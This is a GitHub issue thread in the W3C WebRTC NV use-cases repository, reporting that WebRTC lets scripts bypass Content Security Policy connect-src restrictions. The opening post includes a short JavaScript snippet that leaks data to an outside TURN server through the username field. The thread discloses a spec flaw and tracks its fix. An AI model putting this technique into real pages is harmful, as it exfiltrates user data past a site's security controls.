search

w3c / webrtc-nv-use-cases

Use cases for WebRTC NV
https://w3c.github.io/webrtc-nv-use-cases/
Other
32 stars 13 forks source link

WebRTC bypass CSP connect-src policies #35

Closed murillo128 closed 5 years ago

murillo128 commented 6 years ago

As explained in here: https://github.com/w3c/webappsec-csp/issues/92 WebRTC bypass the CSP security policies for connect-src and a malicious script could use webrtc to leak data to a rogue server.

Note that it is not even needed to use datachannels at all, as you could leak data (at low rate) to a specially crafted TURN server on the username:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);

IMHO this should be covered at the CSP spec, but we should add a warning at the security and privacy section of the webrtc spec until this is solved.

alvestrand commented 6 years ago

Pull request on CSP spec: https://github.com/w3c/webappsec-csp/pull/287

henbos commented 6 years ago

What's the status here?

alvestrand commented 5 years ago

Since this is a new feature, and we've stopped adding new features, I'm moving this to the NV repo.

aboba commented 5 years ago

With merger of PR 38, closing this issue.